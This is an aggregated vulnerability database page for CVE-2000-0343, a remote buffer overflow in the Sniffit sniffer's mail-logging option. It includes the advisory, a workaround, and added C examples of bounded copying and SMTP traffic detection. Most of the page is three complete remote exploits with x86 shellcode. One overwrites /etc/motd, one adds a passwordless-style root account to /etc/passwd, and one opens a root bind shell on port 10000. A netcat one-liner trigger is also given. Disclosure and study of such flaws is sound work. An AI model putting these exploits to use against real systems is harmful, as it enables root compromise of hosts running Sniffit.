CVE-2000-0343
CVSS 10.0
Published: 2000-05-02 00:00:00
Revised: 2008-09-10 15:04:11

[Original] Buffer overflow in Sniffit 0.3.x with the -L logging option enabled allows remote attackers to execute arbitrary commands via a long MAIL FROM mail header.


[CNNVD] Sniffit mail header handling buffer overflow vulnerability (CNNVD-200005-011)

        
        Sniffit is a widely used sniffer that runs on many Unix/Linux platforms.
        It contains a buffer overflow that can give a remote attacker root on the host running it.
        When Sniffit is started with "-L mail", it copies the mail headers it captures ("mail from:" and "rcpt to:") into a fixed-size buffer with no length check, so an over-long header overflows it. The two affected sites are:
         if(strstr(workbuf1,"mail from")!=NULL)
         {
         char workbuf2[MTU];
         strcpy(workbuf2, strstr(workbuf1,"mail from"));
        and
         if(strstr(workbuf1,"rcpt to")!=NULL)
         {
         char workbuf2[MTU];
         strcpy(workbuf2, strstr(workbuf1,"rcpt to"));
        ...
        Sending a line with an over-long "mail from:..." or "rcpt to:..." to port 25 of any host on the monitored segment overflows the buffer inside Sniffit on the sniffing host (the packet only has to be visible to the sniffer; the SMTP server it is addressed to does not need to accept it):
        echo "mail from:`perl -e 'print "A"x300'`"|nc -vv HOSTNAME 25
        Tracing Sniffit under gdb on the sniffing host gives:
        Program received signal SIGSEGV, Segmentation fault.
        0x61616161 in ?? ()
        (gdb) i all
         eax: 0x0 0
         ecx: 0x8057648 134575688
         edx: 0x8057648 134575688
         ebx: 0xbfff5b84 -1073783932
         esp: 0xbfff47a4 -1073789020
         ebp: 0x61616161 1633771873
         esi: 0xbfff6f0c -1073778932
         edi: 0xbfff6f0c -1073778932
         eip: 0x61616161 1633771873
        ...
        EBP and EIP both hold 0x61616161 ("aaaa"): the saved frame pointer and return address were overwritten by the copied header. The bytes are 'a' rather than the 'A' that was sent because Sniffit lower-cases the captured line before matching it against "mail from"; the published exploits therefore either keep their shellcode out of the lower-cased buffer or encode it to survive the conversion.
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [can take the whole system down]
Access complexity: LOW [no special conditions are needed to exploit]
Access vector: [--]
Authentication: NONE [no authentication needed to exploit]

- CPE (affected platforms and products)

cpe:/a:brecht_claerhout:sniffit:0.3.6hip
cpe:/a:brecht_claerhout:sniffit:0.3.7beta

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0343
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0343
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-011
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1158
(VENDOR_ADVISORY)  BID  1158
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200005021736.TAA01991@ALuSSi
(UNKNOWN)  BUGTRAQ  20000502 spj-003-000 - S0ftPj Advisory

- Vulnerability information

Sniffit mail header handling buffer overflow vulnerability
Critical  Boundary condition error
2000-05-02 00:00:00 2005-10-20 00:00:00
Remote
        

- Advisories and patches

        Workaround:
        If you cannot install the patch or upgrade right away, CNNVD recommends the following to reduce the risk:
        * In sn_analyse.c, replace the strcpy() calls with a bounded copy (strncpy() or equivalent) that copies at most the size of the destination buffer. Note that strncpy() does not NUL-terminate the destination when the source is at least as long as the limit, so terminate it explicitly; the sprintf() into line[250] in print_mail() (sn_logfile.c) needs the same treatment with snprintf().
        * Since the attacker's packet only has to be visible to the sniffer, run Sniffit without mail logging (-L mail / -L normmail) until it is patched.
        Vendor patch:
        Brecht Claerhout
        ----------------
        The vendor has released an updated version that fixes this issue; download it from the vendor's homepage:
        
        http://reptile.rug.ac.be/~coder/sniffit/sniffit.html
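The fix the workaround describes, written out as an added example for this page (it is not Sniffit's source and not the vendor's patch): the unbounded copy from the description next to a bounded version that always terminates the buffer, plus the same treatment for the sprintf() in print_mail() quoted later on this page from sn_logfile.c. The names workbuf2 and the "%s: mail [%s]" format are the page's; the function names copy_mail_header_safe, format_logline_safe and demo_truncated_copy, the 64-byte destination used to force truncation, and the sample "mail from:" line are this example's own constructions.

```c
#include <stdio.h>
#include <string.h>

#define LOGLINE_SZ 250   /* line[250] in the print_mail() quoted on this page */

/* The pattern from the description: the tail of the sniffed line starting at
   the keyword is copied with strcpy() and nothing bounds it to sizeof(workbuf2).
   Kept for comparison only; never call it on network data. */
void copy_mail_header_unsafe(char *workbuf2, const char *workbuf1, const char *keyword)
{
    if (strstr(workbuf1, keyword) != NULL)
        strcpy(workbuf2, strstr(workbuf1, keyword));
}

/* Bounded replacement. Returns 0 if the keyword is absent, 1 if the header
   was copied whole, 2 if it had to be truncated. dst is always NUL-terminated;
   strncpy() on its own does not guarantee that when the source is dstsz bytes
   or longer, which is the catch in the "just use strncpy" advice. */
int copy_mail_header_safe(char *dst, size_t dstsz, const char *workbuf1, const char *keyword)
{
    const char *p;
    size_t n;

    if (dstsz == 0)
        return 0;
    p = strstr(workbuf1, keyword);
    if (p == NULL) {
        dst[0] = '\0';
        return 0;
    }
    n = strlen(p);
    if (n < dstsz) {
        memcpy(dst, p, n + 1);          /* fits, including the terminator */
        return 1;
    }
    memcpy(dst, p, dstsz - 1);          /* truncate and terminate explicitly */
    dst[dstsz - 1] = '\0';
    return 2;
}

/* Bounded replacement for print_mail()'s sprintf(line, "%s: mail [%s]", conn, msg).
   snprintf() never writes past linesz and always terminates; the return value
   reports whether the log line was cut short (1) or not (0). */
int format_logline_safe(char *line, size_t linesz, const char *conn, const char *msg)
{
    int need = snprintf(line, linesz, "%s: mail [%s]", conn, msg);
    return need < 0 || (size_t)need >= linesz;
}

/* Constructed input (not captured traffic): the shape of the PoC one-liner,
   "mail from:" followed by 300 'A's, copied into a deliberately small 64-byte
   destination so the truncation path is exercised. Returns the copy status. */
int demo_truncated_copy(void)
{
    char sniffed[400];
    char workbuf2[64];

    memcpy(sniffed, "mail from:", 10);
    memset(sniffed + 10, 'A', 300);
    sniffed[310] = '\0';

    return copy_mail_header_safe(workbuf2, sizeof workbuf2, sniffed, "mail from");
}

int main(void)
{
    char line[LOGLINE_SZ];
    char longmsg[400];
    const char *conn = "192.168.0.1.1024-192.168.0.69.25";   /* "src.port-dst.port", the form Sniffit logs */

    memset(longmsg, 'A', sizeof longmsg - 1);
    longmsg[sizeof longmsg - 1] = '\0';

    printf("copy of 310-byte header into 64 bytes: status %d (2 = truncated, buffer intact)\n",
           demo_truncated_copy());
    printf("short message truncated: %d\n",
           format_logline_safe(line, sizeof line, conn, "mail from: <x@y>"));
    printf("long message truncated:  %d\n",
           format_logline_safe(line, sizeof line, conn, longmsg));
    return 0;
}
```

Whichever bounded call is used, a truncated header is worth logging on its own: no legitimate mail client sends a "mail from:" argument longer than the sniffer's buffer, so the truncation status is a cheap indicator that someone is probing the sniffer rather than the mail server.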

- Vulnerability information (19886)

Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (1) (EDBID:19886)
multiple remote
2000-05-02 Verified
0 FuSyS
N/A
source: http://www.securityfocus.com/bid/1158/info

Sniffit is a freely available, open source network monitoring tool. It is designed for use on the Unix and Linux Operating Systems.

Sniffit contains a remotely exploitable buffer overflow vulnerability. If Sniffit is configured to log emails, attackers may be able to exploit a stack overflow in the logging mechanism and execute arbitrary code as root on the underlying host.

There may be other buffer overflow vulnerabilities in sniffit related to the logging mechanism. There are several suspicious instances of sprintf() in the logging functions. Administrators are advised to use more actively supported alternatives such as Snort or dsniff.

/*
 * Sniffit 0.3.7beta Linux/x86 Remote Exploit
 * ShellCode is a modified version of w00w00 write egg, 
 * to pass Sniffit input filter
 *
 * Tested on 	RedHat 5.2, 6.0, 6.2
 * Proof Of Concept Code
 *
 * credits:	|CyraX| for pointing me to the coredump
 *		del0 for hurrying me :)
 *		vecna for offering me drinks ;P
 *		belf for loving and caring his GSM ;P
 * 
 *     			    	     FuSyS [S0ftpj|BFi]
 * 				 http://www.s0ftpj.org/
 */

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<stdint.h>
#include<unistd.h>
#include<netdb.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>

#define LENGTH		600
#define RET		RH6x
#define RH52		0xbfff5c10
#define RH6x		0xbfff5bb5 	// 0.3.6HIP 0xbfffcc50
#define OFFSET          0
#define ALIGNOP		3		// 3 RH6.0, 4 RH6.2
					// may vary [1-5]


/* Note To Script Kiddies: This ShellCode Simply Changes An
   Existing /etc/motd So Don't Bother DownLoading */

unsigned char shellcode[]=
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb"
"\x30\xe4\x88\x63\x09\x31\xc9\x66\xb9\x01\x04\x31\xd2\x66\xba\xa4"
"\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x3f\x01\xf9\x31"
"\xd2\xb2\x0e\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f"
"\x65\x74\x63\x2f\x6d\x6f\x74\x64\x01\x66\x75\x73\x79\x73\x20\x77"
"\x61\x73\x20\x68\x65\x72\x65\x0a";

/* Resolve a dotted quad or a hostname to a network-order IPv4 address. */
in_addr_t nameResolve(char *hostname)
{
  struct in_addr addr;
  struct hostent *hostEnt;

  if((addr.s_addr=inet_addr(hostname)) == INADDR_NONE) {
    if(!(hostEnt=gethostbyname(hostname))) {
        printf("Name Resolution Error:`%s`\n",hostname);
        exit(0);
    }
    memcpy(&addr.s_addr,hostEnt->h_addr_list[0],sizeof(addr.s_addr));
  }
  return addr.s_addr;
}

int main(int argc,char **argv)
{
        char buff[LENGTH+ALIGNOP+1];
	char cmd[sizeof("mail from:")+sizeof(buff)];	// room for the prefix plus the whole payload
        uint32_t addr;					// 32-bit x86 target address, emitted little-endian below
        uint32_t sp;
        int offset=OFFSET;
        int i, x;
        int sock;
        struct sockaddr_in sin;

	if(argc<2) {
		fprintf(stderr, "Usage: %s <sniffit host>\n", argv[0]);
		exit(0);
	}

        sp=(uint32_t) RET;
        addr=sp-offset;

	/* Payload layout: NOP sled, shellcode, then RET repeated to the end of
	   the buffer so whichever 4-byte slot holds the saved EIP receives it.
	   ALIGNOP shortens the sled so those slots stay 4-byte aligned; the
	   i-=1 below makes the first RET overwrite the shellcode's trailing
	   newline byte, as in the original. */
	memset(buff,0,sizeof(buff));			// also guarantees NUL termination for strlen()
	for(i=0;i<120-ALIGNOP;i++)
		buff[i]=0x90;
	for(x=0; x<(int)strlen((char *)shellcode); i++, x++)
		buff[i]=shellcode[x];
	for(i-=1 ; i<LENGTH; i+=4) {
		buff[i  ] =  addr & 0x000000ff;
  		buff[i+1] = (addr & 0x0000ff00) >> 8;
  		buff[i+2] = (addr & 0x00ff0000) >> 16;
  		buff[i+3] = (addr & 0xff000000) >> 24;
 	}

	printf("\nSniffit <=0.3.7beta Linux/x86 Remote Exploit\n");
	printf("by FuSyS [S0ftpj|BFi] - http://www.s0ftpj.org\n\n");

        memset(&sin,0,sizeof(sin));
        sin.sin_family=AF_INET;
        sin.sin_port=htons(25);
        sin.sin_addr.s_addr=nameResolve(argv[1]);

	printf("Connecting to %s ...\n", argv[1]);

        if((sock=socket(AF_INET,SOCK_STREAM,0))<0)
        {
                printf("Can't create socket\n");
                exit(0);
        }
        if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0)
        {
                printf("Can't connect to Sniffit Server\n");
                exit(0);
        }

	printf("Injecting ShellCode ...\n");

	/* The sniffer only has to see this packet on the wire; the SMTP
	   server it is addressed to does not need to accept or parse it. */
	cmd[0]='\0';
	strncat(cmd, "mail from:", sizeof(cmd)-1);
	strncat(cmd, buff, sizeof(cmd)-strlen(cmd)-1);
	if(write(sock, cmd, strlen(cmd))<0)
		printf("write failed\n");

	printf("Done!\n\n");

        return(0);
}
		

- Vulnerability information (19887)

Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (2) (EDBID:19887)
multiple remote
2000-05-02 Verified
0 MaXX
N/A
source: http://www.securityfocus.com/bid/1158/info
 

/*
 * 5niffi7.c - exploiting sniffit 0.3.7.beta for Debian 2.2
 * Copyright (C) 2000  Michel "MaXX" Kaempf <maxx@via.ecp.fr>
 *
 * When a running sniffit session logs the packet sent by 5niffi7,
 * the following shellcode is executed. This shellcode adds the
 * line "r00t:36msvq8vbkg5k:0:0:r00t:/:/bin/sh" to /etc/passwd.
 * Cracking r00t's password should not be too hard :-)
 *
 * 5niffi7.c is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define FROM "mail from: "
#define RET 0xbfff6b5b

char shellcode[] =
"\xeb\x5b\x90\x90\x90\x90\x90\x90"
"\x90\x90\x5e\x80\x6e\xd9\x1a\x80"
"\x6e\xdd\x1a\x80\x6e\xd7\x1a\x80"
"\x6e\xc4\x1a\x80\x6e\xe4\x1a\x90"
"\x90\x90\x90\x31\xc0\x88\x60\x0b"
"\xb0\x05\x89\xf3\x31\xc9\x66\xb9"
"\x01\x04\x31\xd2\xcd\x80\x89\xc7"
"\xc6\x60\x31\x24\x31\xc0\x88\x60"
"\x32\xb0\x04\x89\xfb\x8d\x68\x0c"
"\x31\xd2\xb2\x26\xcd\x80\x31\xc0"
"\xb0\x06\x89\xfb\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xa8\xff"
"\xff\xff\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x78\x72\x30"
"\x30\x74\x3a\x33\x36\x6d\x73\x76"
"\x71\x38\x76\x62\x6b\x67\x35\x6b"
"\x3a\x30\x3a\x30\x3a\x72\x30\x30"
"\x74\x3a\x2f\x3a\x2f\x62\x69\x6e"
"\x2f\x73\x68\x78\x78";

int main( int argc, char * argv[] )
{
	int sock_client;
	struct sockaddr_in addr_server, addr_client;
	socklen_t addr_len;
	int i, j, filler;
	char * ip_src, * ip_dst;
	char conn[ 256 ], msg[ 1500 ];
	uint32_t ret = RET;	/* 4-byte little-endian return address for the x86 target */

	if ( argc != 2 )
	{
		fprintf( stderr, "Usage: %s IP\n", argv[0] );
		exit( -1 );
	}

	if ( (sock_client = socket(PF_INET, SOCK_STREAM, 0)) < 0 )
	{
		exit( -1 );
	}

	memset( &addr_server, 0, sizeof(struct sockaddr_in) );
	addr_server.sin_family = AF_INET;
	addr_server.sin_port = htons( 25 );
	if ( inet_aton( argv[1], &addr_server.sin_addr ) == 0 )
	{
		fprintf( stderr, "Bad IP address: %s\n", argv[1] );
		exit( -1 );
	}

	if ( connect(sock_client, (struct sockaddr *)&addr_server, sizeof(struct sockaddr_in)) < 0 )
	{
		exit( -1 );
	}

	/* Read back our own address and port: the sniffer prefixes the logged
	   line with "src.sport-dst.dport", and the overflow offset depends on
	   the exact length of that string. */
	addr_len = sizeof( addr_client );
	if ( getsockname( sock_client, (struct sockaddr *)&addr_client, &addr_len ) < 0 )
	{
		exit( -1 );
	}

	ip_src = strdup( inet_ntoa(addr_client.sin_addr) );
	ip_dst = strdup( inet_ntoa(addr_server.sin_addr) );
	snprintf( conn, sizeof(conn), "%s.%u-%s.%u", ip_src, ntohs(addr_client.sin_port), ip_dst, ntohs(addr_server.sin_port) );
	free( ip_src );
	free( ip_dst );

	/* Payload: FROM, filler up to the end of the sniffer's 256-byte log line,
	   the return address, a 1024-byte NOP sled, then the shellcode. */
	memset( msg, 0, sizeof(msg) );
	i = 0;
	for ( j = 0; j < (int)strlen(FROM); i++, j++ )
	{
		msg[ i ] = FROM[ j ];
	}
	filler = 256 - (int)strlen(conn) - (int)strlen(": mail [") - (int)strlen(FROM);
	for ( j = 0; j < filler; i++, j++ )
	{
		msg[ i ] = 'A';
	}
	memcpy( &msg[i], &ret, sizeof(ret) );	/* always 4 bytes, whatever sizeof(long) is on the attacking host */
	i += 4;
	for ( j = 0; j < 1024; i++, j++ )
	{
		msg[ i ] = 0x90;
	}
	for ( j = 0; j < (int)strlen(shellcode); i++, j++ )
	{
		msg[ i ] = shellcode[ j ];
	}

	if ( write(sock_client, msg, strlen(msg)) < 0 )
	{
		exit( -1 );
	}

	close( sock_client );

	exit( 0 );
}

- Vulnerability information (19888)

Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (3) (EDBID:19888)
multiple remote
2002-01-18 Verified
0 g463
N/A
source: http://www.securityfocus.com/bid/1158/info
 

/*

   Remote overflow in sniffit.0.3.7.beta
   tested on slackware 7.1
   found/coded by g463
   -18th january 2002-

   The vulnerability is triggered when the option -L is called from the
   command line with 'normmail'
   ie : ./sniffit -c ./sample_config_file -L normmail
   It calls a piece of code where the buffer is unchecked

       //From sniffit.0.3.7.beta/sn_logfile.c
       void print_mail (char *conn, char *msg)
       {
       char line[250];
       sprintf(line,"%s: mail [%s]",conn,msg);
       print_logline (line);
       }

       -  In a normal situation, it could be easier to fill line[250] with our
       shellcode, but since this buffer gets filtered with some kind of
       strlower() function (thus our shellcode/return address too), i rely
       on an unfiltered buffer with the same data so we can point eip back
       at that place with clean, unmodified shellcode :D


All my brothers (alphabetical order) : Erebus, Jinx, mtadbf, nitr0gen, Slink[e]
+ some others i forget :p

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define SMTP_PORT 25
#define MAX_LINE 256
#define BUFLEN 252

//define this to your ip
#define MY_IP "192.168.0.1"

//Value for overwriting eip
//should be the address of the data buffer + some couple of garbage bytes
#define RETADR 0x08059408

//Port binding shellcode, binds on port 10000
//taken from bighawk@warfare.com
char shellcode[] =
   "\x31\xc0"			// xor     eax, eax
   "\x31\xdb"			// xor     ebx, ebx
   "\x89\xe5"			// mov     ebp, esp
   "\x99"			// cdq
   "\xb0\x66"			// mov     al, 102
   "\x89\x5d\xfc"		// mov     [ebp-4], ebx
   "\x43"			// inc     ebx
   "\x89\x5d\xf8"		// mov     [ebp-8], ebx
   "\x43"			// inc     ebx
   "\x89\x5d\xf4"		// mov     [ebp-12], ebx
   "\x4b"			// dec     ebx
   "\x8d\x4d\xf4"		// lea     ecx, [ebp-12]
   "\xcd\x80"			// int     80h
   "\x89\x45\xf4"		// mov     [ebp-12], eax
   "\x43"			// inc     ebx
   "\x66\x89\x5d\xec"		// mov     [ebp-20], bx
   "\x66\xc7\x45\xee\x27\x10"	// mov     [ebp-18], word 4135
   "\x89\x55\xf0"		// mov     [ebp-16], edx
   "\x8d\x45\xec"		// lea     eax, [ebp-20]
   "\x89\x45\xf8"		// mov     [ebp-8], eax
   "\xc6\x45\xfc\x10"		// mov     [ebp-4], byte 16
   "\xb2\x66"			// mov     dl, 102
   "\x89\xd0"			// mov     eax, edx
   "\x8d\x4d\xf4"		// lea     ecx, [ebp-12]
   "\xcd\x80"			// int     80h
   "\x89\xd0"			// mov     eax, edx
   "\xb3\x04"			// mov     bl, 4
   "\xcd\x80"			// int     80h
   "\x43"			// inc     ebx
   "\x89\xd0"			// mov     eax, edx
   "\x99"			// cdq
   "\x89\x55\xf8"		// mov     [ebp-8], edx
   "\x89\x55\xfc"		// mov     [ebp-4], edx
   "\xcd\x80"			// int     80h
   "\x31\xc9"			// xor     ecx, ecx
   "\x89\xc3"			// mov     ebx, eax
   "\xb1\x03"			// mov     cl, 3
   "\xb0\x3f"			// mov     al, 63
   "\x49"			// dec     ecx
   "\xcd\x80"			// int     80h
   "\x41"			// inc     ecx
   "\xe2\xf8"			// loop    -7
   "\x52"			// push    edx
   "\x68\x6e\x2f\x73\x68"	// push    dword 68732f6eh
   "\x68\x2f\x2f\x62\x69"	// push    dword 69622f2fh
   "\x89\xe3"			// mov     ebx, esp
   "\x52"			// push    edx
   "\x53"			// push    ebx
   "\x89\xe1"			// mov     ecx, esp
   "\xb0\x0b"			// mov     al, 11
   "\xcd\x80";			// int     80h


int usage (char *);
int calculate_conn_length (struct sockaddr_in, struct sockaddr_in);

int
main (int argc, char *argv[])
{

   struct sockaddr_in stServer, stClient;
   char *ptHost;
   in_addr_t iHost;
   int iSockfd, iLength, iAlign = 0;
   char sBuffer[MAX_LINE + 1];   // +1 so the banner can be NUL-terminated before printing
   char sString[300];
   int i;

   if (argc != 2) usage (argv[0]);

   ptHost = argv[1];
   if ( (iHost = inet_addr (argv[1])) == INADDR_NONE) {

      printf ("Invalid host or host is 255.255.255.255\n");
      exit (-1);

   }

   //Fill the server struct
   memset (&stServer, 0, sizeof (struct sockaddr_in));
   stServer.sin_family      = AF_INET;
   stServer.sin_port        = htons (SMTP_PORT);
   stServer.sin_addr.s_addr = iHost;

   if ( (iSockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {

      printf ("Error opening socket\n");
      exit (-1);

   }

   // Fill the client struct, mainly used to calculate the right align for RET addy
   memset (&stClient, 0, sizeof (struct sockaddr_in));
   stClient.sin_family      = AF_INET;
   stClient.sin_port        = htons (0);
   stClient.sin_addr.s_addr = inet_addr (MY_IP);

   if ( (bind (iSockfd, (struct sockaddr *) &stClient, sizeof (stClient))) == -1 ) {

      perror ("Cant bind socket");
      exit (-1);

   }

   // Offset of the saved return address: line[] is 250 bytes, the sniffer
   // prepends "src.port-dst.port: mail [" to our argument, BUFLEN+4 lands on EIP
   iAlign = calculate_conn_length (stClient, stServer);
   i = BUFLEN - iAlign + 4;

   if ( (connect (iSockfd, (struct sockaddr *) &stServer, sizeof (stServer))) != 0) {

      perror ("Cant connect");
      exit (-1);

   }
   else printf ("Connected to host %s on port %d\n\n", ptHost, SMTP_PORT);

   // Receive the SMTP server banner
   if ( (iLength = recv (iSockfd, sBuffer, MAX_LINE, 0)) == -1) {

      perror ("Cant get server banner");
      exit (-1);

   }
   sBuffer[iLength] = '\0';   // recv() does not terminate the buffer
   printf ("%s\n", sBuffer);

   printf ("Building evil string... >:)\n");

   // Layout: "mail from:" + NOP sled + shellcode ending at offset i, then RETADR
   memset (sString, 0x90, sizeof (sString));

   memcpy (sString, "mail from:", strlen ("mail from:"));
   memcpy (sString + i - strlen (shellcode), shellcode, strlen (shellcode));

   sString[i++] = (RETADR & 0x000000ff);
   sString[i++] = (RETADR & 0x0000ff00) >> 8;
   sString[i++] = (RETADR & 0x00ff0000) >> 16;
   sString[i++] = (RETADR & 0xff000000) >> 24;
   sString[i]   = '\0';

   if ( (send (iSockfd, sString, strlen (sString), 0)) == -1) {

      perror ("cant send message");
      exit (-1);

   }

   printf ("Evil string sent!\n");
   printf ("Try telneting the host on port 10000 for r00t shell!\n");

   close (iSockfd);

   return (0);

}

int usage (char *progname)
{

   printf ("%s <ip>\n", progname);
   exit (-1);

}

/*
   function to calculate conn entry length
   ie : strlen of ("192.168.0.1.1024-192.168.0.69.25");
   (fuckin dirty but heh it works)
*/
int calculate_conn_length (struct sockaddr_in me, struct sockaddr_in him)
{
   int length = 0;
   struct in_addr in;

   in.s_addr = me.sin_addr.s_addr;
   length += strlen (inet_ntoa (in));     // 192.168.0.1

   length++;                              // .

   length += 4;                           // 1220  (assumes a 4-digit ephemeral source port)

   length ++;                             // -

   in.s_addr = him.sin_addr.s_addr;
   length += strlen (inet_ntoa (in));     // 192.168.0.69

   length++;                              // .

   length += 2;                           // 25

   length += strlen (": mail [");

   return (length);
}
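Every delivery vector on this page, the nc one-liner and all three exploits, is one over-long MAIL FROM (or RCPT TO) line, which makes the traffic easy to spot on the wire even though the sniffer itself leaves no trace. The classifier below is an added example written for this page, not part of Sniffit or of any of the exploits: it applies the RFC 5321 limits (a path of at most 256 octets, a command line of at most 512 octets including CRLF) plus two heuristics, a run of 0x90 bytes and non-printable bytes, to client SMTP command lines. The sample lines are constructed, and NOP_RUN_LIMIT and the function names are this example's own choices.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* RFC 5321 limits: a reverse-path or forward-path is at most 256 octets and a
   command line at most 512 octets including CRLF. Sniffit's log buffer
   (line[250] in the quoted print_mail()) is smaller still, so a MAIL FROM
   argument anywhere near the RFC limit already overruns the sniffer. */
#define PATH_LIMIT     256
#define CMDLINE_LIMIT  512
#define NOP_RUN_LIMIT  16    /* consecutive 0x90 bytes treated as a sled; this example's threshold */

enum smtp_verdict {
    SMTP_OK = 0,
    SMTP_LONG_PATH,   /* MAIL FROM / RCPT TO argument over PATH_LIMIT */
    SMTP_LONG_LINE,   /* whole command line over CMDLINE_LIMIT */
    SMTP_BINARY,      /* non-printable bytes where only ASCII belongs */
    SMTP_NOP_SLED     /* run of 0x90 bytes, the classic x86 sled */
};

/* Length-bounded, case-insensitive prefix test; SMTP verbs are case-insensitive. */
static int has_prefix_ci(const unsigned char *s, size_t len, const char *prefix)
{
    size_t i;
    for (i = 0; prefix[i] != '\0'; i++)
        if (i >= len || tolower(s[i]) != tolower((unsigned char)prefix[i]))
            return 0;
    return 1;
}

/* Classify one client-to-server SMTP line. The buffer is not assumed to be
   NUL-terminated, because a crafted line may contain NULs. Findings that imply
   an active exploit attempt (sled, binary) are reported before the size checks. */
enum smtp_verdict smtp_line_classify(const unsigned char *line, size_t len)
{
    size_t i, body = len, run = 0;

    while (body > 0 && (line[body - 1] == '\r' || line[body - 1] == '\n'))
        body--;                                   /* ignore the line terminator */

    for (i = 0; i < body; i++) {
        run = (line[i] == 0x90) ? run + 1 : 0;
        if (run >= NOP_RUN_LIMIT)
            return SMTP_NOP_SLED;
    }
    for (i = 0; i < body; i++)
        if (line[i] < 0x20 || line[i] > 0x7e)
            return SMTP_BINARY;
    if (len > CMDLINE_LIMIT)
        return SMTP_LONG_LINE;

    if (has_prefix_ci(line, body, "mail from:") || has_prefix_ci(line, body, "rcpt to:")) {
        const unsigned char *colon = memchr(line, ':', body);   /* present: the prefix contains it */
        size_t arg_len = body - (size_t)(colon - line) - 1;
        if (arg_len > PATH_LIMIT)
            return SMTP_LONG_PATH;
    }
    return SMTP_OK;
}

/* Constructed sample traffic (not captured data): a legitimate command, the
   PoC line from this page, a sled-carrying line and an oversized line. */
#define N_SAMPLES 4
void build_samples(unsigned char out[N_SAMPLES][700], size_t lens[N_SAMPLES])
{
    const char *good = "MAIL FROM:<alice@example.com>\r\n";

    memcpy(out[0], good, strlen(good));                 lens[0] = strlen(good);

    memcpy(out[1], "mail from:", 10);                   /* echo "mail from:`perl -e 'print "A"x300'`" */
    memset(out[1] + 10, 'A', 300);
    out[1][310] = '\n';                                 lens[1] = 311;

    memcpy(out[2], "mail from:", 10);
    memset(out[2] + 10, 'A', 40);
    memset(out[2] + 50, 0x90, 32);                      /* sled */
    memcpy(out[2] + 82, "\r\n", 2);                     lens[2] = 84;

    memcpy(out[3], "HELO ", 5);
    memset(out[3] + 5, 'h', 600);
    memcpy(out[3] + 605, "\r\n", 2);                    lens[3] = 607;
}

/* Run the classifier over the samples; returns how many were flagged. */
int count_flagged_samples(void)
{
    unsigned char samples[N_SAMPLES][700];
    size_t lens[N_SAMPLES];
    size_t i;
    int flagged = 0;

    build_samples(samples, lens);
    for (i = 0; i < N_SAMPLES; i++)
        if (smtp_line_classify(samples[i], lens[i]) != SMTP_OK)
            flagged++;
    return flagged;
}

int main(void)
{
    static const char *names[] = { "ok", "long path", "long line", "binary", "nop sled" };
    unsigned char samples[N_SAMPLES][700];
    size_t lens[N_SAMPLES];
    size_t i;

    build_samples(samples, lens);
    for (i = 0; i < N_SAMPLES; i++)
        printf("sample %zu (%zu bytes): %s\n", i, lens[i],
               names[smtp_line_classify(samples[i], lens[i])]);
    return 0;
}
```

The first two exploits above pass the length check only because their payload sits in a single line; the sled and the non-ASCII shellcode bytes still trip the heuristics, and the third exploit's 0x90-filled sString is caught by the sled rule. The same checks can be put in a stream-reassembling IDS rule, but the point here is that a sniffer monitoring port 25 should be treated as an attack surface and its inputs bounded and watched like any other parser's.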

- Vulnerability information

10649
Sniffit -L Logging Option MAIL FROM Header Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2002-01-19 Unknown
Unknown Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Sniffit Mail Logging Buffer Overflow Vulnerability
Boundary Condition Error 1158
Yes No
2000-05-02 12:00:00 2009-07-11 01:56:00
This vulnerability was discovered by FuSyS <fusys@s0ftpj.org> of s0ftpr0ject 2k - Digital security for Y2K (s0ftpj) no-profit security research.

- Affected program versions

Brecht Claerhout Sniffit 0.3.7 beta
- Debian Linux 2.2 pre potato
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0 r5
- Debian Linux 2.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- FreeBSD FreeBSD 3.4
- FreeBSD FreeBSD 3.3
- FreeBSD FreeBSD 3.2
- FreeBSD FreeBSD 3.1
- FreeBSD FreeBSD 3.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
